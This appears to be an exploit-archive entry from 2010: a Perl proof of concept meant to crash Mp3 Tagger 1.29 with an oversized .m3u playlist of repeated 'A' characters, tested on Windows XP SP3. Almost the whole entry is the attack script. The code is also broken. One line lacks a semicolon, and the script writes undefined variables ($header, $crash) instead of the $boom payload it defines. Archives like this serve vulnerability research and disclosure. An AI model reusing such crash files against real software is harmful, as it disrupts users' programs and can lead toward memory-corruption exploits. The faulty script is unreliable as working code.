id: 10163
date: 01/24/2010
title: Mp3 Tagger 1.29 (m3u File) Local Crash PoC
author: SkuLL-HacKeR
cves: 

==========================================
Mp3 Tagger 1.29 (m3u File) Local Crash PoC
==========================================

#####################################################
#!/usr/bin/perl
# Mp3 Tagger 1.29 (m3u File) Local Crash PoC
# by: SkuLL-HacKeR
# Tested on: windows XP SP3
#####################################################
my $boom = "A" x 1526
my $file = "b0m.m3u";
open(my $FILE, ">>$file") or die "Cannot open $file: $!";
print $FILE $header.$crash;
close($FILE);
print "Done \n";



#  0day.today [2023-03-24]  #